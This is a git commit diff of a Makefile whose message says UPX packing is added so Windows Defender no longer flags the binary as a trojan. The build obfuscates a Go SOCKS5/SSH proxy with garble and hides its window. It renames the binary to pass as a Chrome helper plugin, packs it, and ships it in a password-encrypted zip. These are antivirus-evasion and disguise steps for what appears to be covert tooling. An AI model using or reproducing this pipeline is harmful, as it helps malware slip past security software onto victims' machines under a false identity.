Use UPX (Ultimate Packer for eXecutables) to let Windows Defender marking as Trojan:Win32/Gracing.I

This commit is contained in:
Jerry Jacobs 2024-07-25 08:07:33 +02:00
parent a845f03937
commit d844b2f6b0
1 changed files with 4 additions and 3 deletions

View File

@ -15,9 +15,10 @@ socks5-ssh-proxy.exe: resources $(GARBLE_BIN) $(SOURCES)
GOOS=windows GOARCH=amd64 $(GARBLE_BIN) build -ldflags -H=windowsgui -tags release -o $@ GOOS=windows GOARCH=amd64 $(GARBLE_BIN) build -ldflags -H=windowsgui -tags release -o $@
win-package: ChromeProxyHelperPlugin.zip win-package: ChromeProxyHelperPlugin.zip
ChromeProxyHelperPlugin.zip: socks5-ssh-proxy.exe ChromeProxyHelperPlugin.zip: socks5-ssh-proxy.exe
cp socks5-ssh-proxy.exe chrome-proxy-helper.exe cp socks5-ssh-proxy.exe chrome_proxy.exe
zip -eP resistanceIsFutile ChromeProxyHelperPlugin.zip chrome-proxy-helper.exe upx chrome_proxy.exe
rm -f chrome-proxy-helper.exe zip -eP resistanceIsFutile ChromeProxyHelperPlugin.zip chrome_proxy.exe
rm -f chrome_proxy.exe
install-deps: $(GARBLE_BIN) install-deps: $(GARBLE_BIN)
$(GARBLE_BIN): $(GARBLE_BIN):
go install mvdan.cc/garble@v0.12.1 go install mvdan.cc/garble@v0.12.1